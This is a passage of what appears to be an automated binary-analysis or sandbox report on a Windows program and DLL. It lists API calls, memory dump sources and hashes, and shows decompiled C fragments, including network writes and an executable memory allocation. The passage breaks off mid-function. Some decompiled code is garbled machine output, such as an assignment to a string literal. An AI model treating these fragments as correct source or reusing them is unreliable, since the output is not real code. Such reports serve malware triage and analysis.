                                                                                                                        • Opcode ID: f5523d1dbd27c0eb8af0d6ba76e2a17c5b042296d9785dd9edb21dc9f5509da3
                                                                                                                        • Instruction ID: 9c5ed2ad15826aa4861ff9567c9ec0502a483661ad412179d4508a200c259eb2
                                                                                                                        • Opcode Fuzzy Hash: f5523d1dbd27c0eb8af0d6ba76e2a17c5b042296d9785dd9edb21dc9f5509da3
                                                                                                                        • Instruction Fuzzy Hash: 97113670A48384AADB04FF7E845F7DD3F649B81324F24426EF1461B2C2CA795646C3BA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BEE19
                                                                                                                          • Part of subcall function 004BEB0F: __EH_prolog3.LIBCMT ref: 004BEB16
                                                                                                                        Strings
                                                                                                                        • Callbacks.setStatus: StatusChanged callback not set, xrefs: 004BEE6A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: Callbacks.setStatus: StatusChanged callback not set
                                                                                                                        • API String ID: 431132790-2963191105
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32 ref: 0059F7F6
                                                                                                                        • GetLastError.KERNEL32(?,0059E01A,?,?,?,?,?,?,?,?,?,?,000000A8,0059E794,00000000), ref: 0059F804
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorLastThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1689873465-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D84A1
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,?,?,?,?,?,00000008,004C3112,Logging), ref: 004D84D4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2373586757-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D85C3
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,00000008,004C2410), ref: 004D85F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2373586757-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,?,?,00000000,?,?,004B94BF,?,?), ref: 004B903D
                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 004B9052
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderFromListLocationPathSpecial
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4082711253-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __freeptd.LIBCMT ref: 005428D5
                                                                                                                        • ExitThread.KERNEL32 ref: 005428DF
                                                                                                                          • Part of subcall function 0054B6F0: __FindPESection.LIBCMT ref: 0054B749
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitFindSectionThread__freeptd
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3875298718-0
                                                                                                                        • Opcode ID: bf38d6aade445fd683fc23250041e958ab305ed77acaeb1038a3e994e673a00d
                                                                                                                        • Instruction ID: f91b78106646ab00efe3f5564bb3c9c902be208e6bd20ba3e857690153520d16
                                                                                                                        • Opcode Fuzzy Hash: bf38d6aade445fd683fc23250041e958ab305ed77acaeb1038a3e994e673a00d
                                                                                                                        • Instruction Fuzzy Hash: CED09E301047129AF7347B759D0E7DD7FA4BF8074AF544424F544940B1DBB89D84CD25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004DDFE5
                                                                                                                          • Part of subcall function 004DDEF8: __EH_prolog3.LIBCMT ref: 004DDEFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3H_prolog3_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3355343447-0
                                                                                                                        • Opcode ID: 60160e52a95a2bde7b0c48627ae63641b27596a99d48080995d60c0ce4beb6c4
                                                                                                                        • Instruction ID: 6a24a258222711af561e351bfa2156e0ab07941e5c0c7c21904ef7ec1e558bfd
                                                                                                                        • Opcode Fuzzy Hash: 60160e52a95a2bde7b0c48627ae63641b27596a99d48080995d60c0ce4beb6c4
                                                                                                                        • Instruction Fuzzy Hash: 38719030D0528CEBCF01EBE9C965AEDBB75AF11308F1440AEE0416B296DB791F09D766
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 005075EF
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 005072B5: __EH_prolog3.LIBCMT ref: 005072BF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalInitializeSection
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1185523453-0
                                                                                                                        • Opcode ID: 989a8c9b4409ff34137ae2057257d2359292377de6860364279afef05c8754dd
                                                                                                                        • Instruction ID: dce4a58076b1f79dcc68fbb24687161c045465a5dbd90a94269580c4af74cf0e
                                                                                                                        • Opcode Fuzzy Hash: 989a8c9b4409ff34137ae2057257d2359292377de6860364279afef05c8754dd
                                                                                                                        • Instruction Fuzzy Hash: 8341B170D04249ABCF00EBB9C856BDEBFB4BF19310F04415DE552A72D2DB74AA04CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004DDEFF
                                                                                                                          • Part of subcall function 004D8737: __EH_prolog3.LIBCMT ref: 004D873E
                                                                                                                          • Part of subcall function 004D8737: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000008,004DDF46,?), ref: 004D8775
                                                                                                                          • Part of subcall function 004F8985: __EH_prolog3_GS.LIBCMT ref: 004F898C
                                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$H_prolog3_QueryValuechar_traits
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2246805832-0
                                                                                                                        • Opcode ID: 7c0f16742046c0cf82e0f452d1248b96d913d472505ce95f28ba892708e95cf5
                                                                                                                        • Instruction ID: 6ed7e1eb13f2deb5c84d3cef608bd2f19f6efdf6871414d86584e0a2f72d8771
                                                                                                                        • Opcode Fuzzy Hash: 7c0f16742046c0cf82e0f452d1248b96d913d472505ce95f28ba892708e95cf5
                                                                                                                        • Instruction Fuzzy Hash: BC21A070C0514DAADB01EBE8C962BEEBBB89F11308F1040AEE041772C2DB795F09C766
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F3354E0(void* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                        				long _v4;
                                                                                                                        				intOrPtr _v20;
                                                                                                                        				intOrPtr _t10;
                                                                                                                        				int _t13;
                                                                                                                        				intOrPtr _t15;
                                                                                                                        				void* _t18;
                                                                                                                        				intOrPtr _t23;
                                                                                                                        				void* _t25;
                                                                                                                        
                                                                                                                        				_t10 =  *_a12;
                                                                                                                        				_t25 = 0;
                                                                                                                        				if(_t10 == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t18 = _a4;
                                                                                                                        					_t23 = _a8;
                                                                                                                        					while(1) {
                                                                                                                        						_v4 = 0;
                                                                                                                        						_t13 = InternetWriteFile(_t18, _t25 + _t23, _t10 - _t25,  &_v4); // executed
                                                                                                                        						if(_t13 == 0) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						_t15 = _v20;
                                                                                                                        						if(_t15 != 0) {
                                                                                                                        							_t25 = _t25 + _t15;
                                                                                                                        							_t10 =  *_v4;
                                                                                                                        							if(_t25 < _t10) {
                                                                                                                        								continue;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					return _t25;
                                                                                                                        				}
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • InternetWriteFile.WININET(6F3358C4,?,3B0CC483,6F3358C4), ref: 6F335515
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FileInternetWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1927131202-0
                                                                                                                        • Opcode ID: 943ee48de6f153da1b988902e941c48ae71a6fb5d333489c02d96e219fd986db
                                                                                                                        • Instruction ID: 5ae66350dfbba4b373986f9eb9c8fa638bf3241e5b4c9c9800912d5239c76599
                                                                                                                        • Opcode Fuzzy Hash: 943ee48de6f153da1b988902e941c48ae71a6fb5d333489c02d96e219fd986db
                                                                                                                        • Instruction Fuzzy Hash: 4FF044737043669B9300CE5DE880957F3D9BB89691F51051EF555C3240D720F9048B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 431132790-0
                                                                                                                        • Opcode ID: 29052e571a89c4622a3cd17796fb8b731cabe71a794ecd488a8efe6f77e494b9
                                                                                                                        • Instruction ID: cbf1da70172896e474e1e7c4493e07a6ea64c9e75dea0ee304069738da0211f6
                                                                                                                        • Opcode Fuzzy Hash: 29052e571a89c4622a3cd17796fb8b731cabe71a794ecd488a8efe6f77e494b9
                                                                                                                        • Instruction Fuzzy Hash: 89015AB4A01255ABCB10EBA4EC8AA6E7B39FF84B10B104659F511EB2D1C7389901CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 431132790-0
                                                                                                                        • Opcode ID: dcb672cc15d1c1b9812791a3214e2e64f888795ca5a554862b43985ab5216695
                                                                                                                        • Instruction ID: a6511b989250e932586d4f137ffa7679b783a469f906909701c65ddca75831b9
                                                                                                                        • Opcode Fuzzy Hash: dcb672cc15d1c1b9812791a3214e2e64f888795ca5a554862b43985ab5216695
                                                                                                                        • Instruction Fuzzy Hash: B8F08C71644206AEEF44AFB5890EB7E3FA8BF58321F500569BA15DA1D1EB74D8009B24
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BEB16
                                                                                                                          • Part of subcall function 0040CD04: __EH_prolog3.LIBCMT ref: 0040CD0B
                                                                                                                          • Part of subcall function 00405B1B: __EH_prolog3.LIBCMT ref: 00405B25
                                                                                                                          • Part of subcall function 00405B1B: __CxxThrowException@8.LIBCMT ref: 00405B56
                                                                                                                          • Part of subcall function 00405B1B: __EH_prolog3_catch.LIBCMT ref: 00405B63
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 24280941-0
                                                                                                                        • Opcode ID: a8cb32522bd01ea6b73e3970c2884a8fbaa61a23be2959a159b2e61c3bfa88be
                                                                                                                        • Instruction ID: af61eaa94382c69b3300d68eadf7dc43faa917ba5aca0a2887ff9092679f13c1
                                                                                                                        • Opcode Fuzzy Hash: a8cb32522bd01ea6b73e3970c2884a8fbaa61a23be2959a159b2e61c3bfa88be
                                                                                                                        • Instruction Fuzzy Hash: 83018B31800249EADF10EFA8C80ABCC7FB0AF00318F144269F455672D2CBB99A448BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B4C0() {
                                                                                                                        				void* _t4;
                                                                                                                        				void* _t13;
                                                                                                                        
                                                                                                                        				E6F33B460();
                                                                                                                        				_t13 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x2700000
                                                                                                                        				if(_t13 != 0) {
                                                                                                                        					E6F33B4B0();
                                                                                                                        					return 1;
                                                                                                                        				} else {
                                                                                                                        					_t4 = HeapCreate(0, 0, 0); // executed
                                                                                                                        					"ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t4;
                                                                                                                        					if(_t4 == 0) {
                                                                                                                        						E6F33B4B0();
                                                                                                                        						return 9;
                                                                                                                        					} else {
                                                                                                                        						E6F33A540(_t4);
                                                                                                                        						E6F33B4B0();
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B472
                                                                                                                          • Part of subcall function 6F33B460: Sleep.KERNEL32(00000001,00000001,?,00000001,?,?,?,?,?,6F331FE4,00000000,?,?), ref: 6F33B48B
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B497
                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000100,6F338CDE), ref: 6F33B4D3
                                                                                                                          • Part of subcall function 6F33B4B0: InterlockedExchange.KERNEL32(6F340620,00000000), ref: 6F33B4B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$Compare$CreateHeapSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1766302375-0
                                                                                                                        • Opcode ID: 458e1e2e6c865d59582693fcfbc10f7c7aac249789f366abcdd29742ecd9e20b
                                                                                                                        • Instruction ID: 047d3a78ef540c62b6ab8bdcb2a699144b53fbad22efb848229d2734342f84bf
                                                                                                                        • Opcode Fuzzy Hash: 458e1e2e6c865d59582693fcfbc10f7c7aac249789f366abcdd29742ecd9e20b
                                                                                                                        • Instruction Fuzzy Hash: 2BE04F33F05EB906DA11F7B578006DA65888F4266AB070069EA888A384CF2C884143E9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BC36F
                                                                                                                          • Part of subcall function 004BC301: __EH_prolog3.LIBCMT ref: 004BC308
                                                                                                                          • Part of subcall function 00527E30: GetProcessHeap.KERNEL32(00000000,?), ref: 00527E8B
                                                                                                                          • Part of subcall function 00527E30: HeapFree.KERNEL32(00000000), ref: 00527E92
                                                                                                                          • Part of subcall function 00527E30: CloseHandle.KERNEL32(00000000,2F9F5BE6,?), ref: 00527EAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3Heap$CloseFreeHandleProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2237233628-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B3BB
                                                                                                                          • Part of subcall function 0049B386: __EH_prolog3.LIBCMT ref: 0049B38D
                                                                                                                          • Part of subcall function 004805F4: _memset.LIBCMT ref: 004805FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1193784468-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004B949B
                                                                                                                          • Part of subcall function 004B902E: SHGetSpecialFolderLocation.SHELL32(00000000,?,?,00000000,?,?,004B94BF,?,?), ref: 004B903D
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalFolderH_prolog3H_prolog3_InitializeLocationSectionSpecial
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1273162838-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F6CA9
                                                                                                                          • Part of subcall function 004858F2: __EH_prolog3.LIBCMT ref: 004858F9
                                                                                                                          • Part of subcall function 0049B3B4: __EH_prolog3.LIBCMT ref: 0049B3BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 431132790-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004B93A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleInternet
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1081599783-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B38D
                                                                                                                          • Part of subcall function 0049B32E: __EH_prolog3.LIBCMT ref: 0049B335
                                                                                                                          • Part of subcall function 0049B32E: CryptGenRandom.ADVAPI32(?,?,?,00000048,0049B3AE,?,?,00000004,0049B3DC,?,?,?,0000000C,004F6CCF,?,?), ref: 0049B348
                                                                                                                          • Part of subcall function 0049B32E: __CxxThrowException@8.LIBCMT ref: 0049B379
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CryptException@8RandomThrow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3670306203-0
                                                                                                                        • Opcode ID: ca36afae9db2cf58193730346521e817ff3285876022af0aca717bf013cc7e3a
                                                                                                                        • Instruction ID: bf56014202067d8055c103ed3f8baa7151a3cdec1537bc46ceae62ec0e038ae6
                                                                                                                        • Opcode Fuzzy Hash: ca36afae9db2cf58193730346521e817ff3285876022af0aca717bf013cc7e3a
                                                                                                                        • Instruction Fuzzy Hash: F9D0C97480011AEADF01EFD4C91ABADBF71FF44308F408428B614AA292CB755A08DF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegCloseKey.KERNEL32(?,?,004C2136,?,008326C4), ref: 004D82AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: da5f33b3cf6d96f551713abdd59cbd5d0860e8efd2832817ac9cade17e9be35a
                                                                                                                        • Instruction ID: 69603484279da66ae7ba95a0f5b7a5d0fecd8c781cd9d1ea75d222655bde9f33
                                                                                                                        • Opcode Fuzzy Hash: da5f33b3cf6d96f551713abdd59cbd5d0860e8efd2832817ac9cade17e9be35a
                                                                                                                        • Instruction Fuzzy Hash: B0B092320246208BE7351F06F8497D2B7B5AB20222F01065AE0424A571D6AA6DDA9BD4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __fsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3646066109-0
                                                                                                                        • Opcode ID: 2944bcf569b94e2b44a73485ac56fc0f61e1c0f057e6f4bc3992d41405ae1331
                                                                                                                        • Instruction ID: 3abcb2526eb90f35fc7cd3321344e052b6764503d5ee836da5a1f4e353846954
                                                                                                                        • Opcode Fuzzy Hash: 2944bcf569b94e2b44a73485ac56fc0f61e1c0f057e6f4bc3992d41405ae1331
                                                                                                                        • Instruction Fuzzy Hash: 25B012B580C200BECA111600AC02B097B517BC4710F90C814BB5C1016092369124AE0B
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005272A0: WaitForSingleObject.KERNEL32 ref: 005272EE
                                                                                                                          • Part of subcall function 005272A0: ReleaseMutex.KERNEL32(00000000), ref: 00527312
                                                                                                                          • Part of subcall function 005272A0: CloseHandle.KERNEL32(00000000), ref: 0052732A
                                                                                                                        • TlsSetValue.KERNEL32(00000032,?), ref: 00527655
                                                                                                                          • Part of subcall function 00527490: TlsSetValue.KERNEL32(00000032,00000000), ref: 00527507
                                                                                                                          • Part of subcall function 00527490: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00527532
                                                                                                                          • Part of subcall function 00527490: HeapFree.KERNEL32(00000000), ref: 00527539
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapValue$CloseFreeHandleMutexObjectProcessReleaseSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2825495486-0
                                                                                                                        • Opcode ID: ff859620a0cf7f612666589844352bc59dac50a22ad6e30f6a4476544e8e6d44
                                                                                                                        • Instruction ID: 41a6373704d868df6cdd66b7c0d071a2566b67ca7d946b786b2b8bb785c91257
                                                                                                                        • Opcode Fuzzy Hash: ff859620a0cf7f612666589844352bc59dac50a22ad6e30f6a4476544e8e6d44
                                                                                                                        • Instruction Fuzzy Hash: 2B018B72A04218AFCB10DF99ED45B5ABBE8FB49761F10422AF824D3780D77669008AA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A590() {
                                                                                                                        				void* _t7;
                                                                                                                        				intOrPtr* _t8;
                                                                                                                        				void _t9;
                                                                                                                        				void* _t11;
                                                                                                                        
                                                                                                                        				_t7 =  *0x6f34095c; // 0x26b0000
                                                                                                                        				if(_t7 == 0) {
                                                                                                                        					L4:
                                                                                                                        					_t7 = VirtualAlloc(0, 0x1000, 0x3000, 0x40); // executed
                                                                                                                        					if(_t7 != 0) {
                                                                                                                        						_t2 = _t7 + 0x20; // 0x20
